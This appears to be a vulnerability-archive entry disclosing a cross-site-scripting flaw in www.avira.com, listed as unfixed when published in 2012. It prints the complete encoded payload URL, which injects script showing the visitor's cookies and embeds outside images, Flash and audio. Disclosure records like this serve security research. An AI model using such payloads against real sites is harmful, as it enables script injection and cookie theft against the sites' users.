Security researcher Sony, has submitted on 30/03/2011 a cross-site-scripting (XSS) vulnerability affecting www.avira.com, which at the time of submission ranked 1816 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/01/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 30/03/2011 |
Date published: 10/01/2012 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: Sony |
Domain: www.avira.com |
Category: XSS |
Pagerank: 1816 |
|---|
URL: http://www.avira.com/en/support-virus-lab?sq=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22by%20Sony%22%2
9%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%22http://img257.image
shack.us/img257/3733/77822687.png%22%20style=%22height:%20300px;%20width:%20450px;%22%20alt=%22InSec
urity.Ro%22%3E%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22
application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%2
0value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20val
ue=%22false%22%3E%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22
%20value=%22src=ftp://91.195.60.6/mp3/mp3/S/Snoop%20Dogg/Snoop%20Dogg%20-%20Doggy%20Style/Snoop%20Do
gg-%2018%20-%20Pump%20Pump.mp3&autostart=yes%22%3E%3C/object%3E |
|
Click here to view the mirror
|
|
|
| 
